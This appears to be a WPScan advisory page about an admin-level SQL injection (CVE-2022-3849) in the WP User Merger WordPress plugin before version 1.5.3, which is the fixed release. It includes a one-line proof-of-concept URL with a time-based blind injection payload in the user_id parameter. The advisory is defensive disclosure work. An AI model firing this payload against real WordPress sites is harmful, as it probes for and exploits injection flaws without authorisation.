WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP User Merger < 1.5.3 - Admin+ SQLi via user_id

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin

Proof of Concept

https://example.com/wp-admin/user-edit.php?user_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(3)))hlAf)

Affects Plugins

wp-user-merger
Fixed in version 1.5.3

References

CVE
CVE-2022-3849
URL
https://bulletin.iese.de/post/wp-user-merger_1-5-1_3/

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Kunal Sharma (University of Kaiserslautern), Daniel Krohmer (Fraunhofer IESE)

Submitter

Kunal Sharma

Submitter website
https://iese.fraunhofer.de/en.html
Verified

Yes

WPVDB ID
511327d3-499b-4ad9-8fd3-99f9f7deb4f5

Timeline

Publicly Published

2022-11-07 (about 4 months ago)

Added

2022-11-07 (about 4 months ago)

Last Updated

2022-12-02 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin